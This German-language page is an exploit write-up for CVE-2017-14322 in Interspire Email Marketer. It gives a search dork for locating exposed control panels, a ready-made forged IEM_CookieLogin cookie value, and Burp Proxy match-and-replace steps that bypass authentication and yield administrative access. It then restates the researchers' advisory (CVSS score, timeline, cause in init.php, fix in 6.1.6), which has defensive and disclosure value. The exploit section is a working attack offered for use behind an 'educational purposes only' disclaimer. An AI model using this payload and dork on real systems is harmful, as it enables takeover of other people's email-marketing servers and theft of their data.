
CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit
intitle:"Control Panel" + emailmarketer
Fügen Sie eine Match-and-Replace-Regel für den Request-Header wie unten hinzu:
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D
Wenn Sie die Seite öffnen, funktioniert es beim ersten Mal nicht, da der Cookie-Header nicht vorhanden ist. Aktualisieren Sie die Seite ein zweites Mal mit dem Burp-Proxy und der oben hinzugefügten Regel, und Sie werden sehen, was Sie wollten. Stellen Sie sicher, dass Sie "Intercept Client Requests" aktivieren.
Interspire Email Marketer - Remote Admin Authentication Bypass
Hakan Küsne, Infoteam Security (CH)
CVE-2017-14322
CVSS Base Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O
2017-09-12 Schwachstelle entdeckt 2017-09-12 Hersteller hat die Schwachstelle bereits behoben, aber nie an Kunden kommuniziert, sodass Hunderte in freier Wildbahn verwundbar blieben 2017-10-17 Öffentliche Offenlegung
Interspire Email Marketer vor Version 6.1.6
http://www.interspire.com/emailmarketer/
Die Funktion zur Überprüfung, ob der Benutzer bereits eingeloggt ist, init.php in Interspire Email Marketer (IEM) vor 6.1.6 ermöglicht es entfernten Angreifern, die Authentifizierung zu umgehen und administrativen Zugriff zu erlangen, indem sie das Cookie IEM_CookieLogin mit einem speziell präparierten Wert verwenden. Darüber hinaus, wenn der Kunde keinen jährlichen Wartungsvertrag hat, gibt die Anwendung an, dass sie die letzte verfügbare Version sei und es kein Update gebe.
Die Schwachstellen wurden während einer Incident-Response auf einer kompromittierten Instanz der Anwendung entdeckt.
Details hier bereitgestellt: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
Der Hersteller hat die Schwachstelle in Version 6.1.6 behoben, aber seine Kunden nie spezifisch darüber informiert.
Dieser Exploit dient nur zu Bildungszwecken und übernimmt keine Verantwortung für Ihre eigenen Handlungen.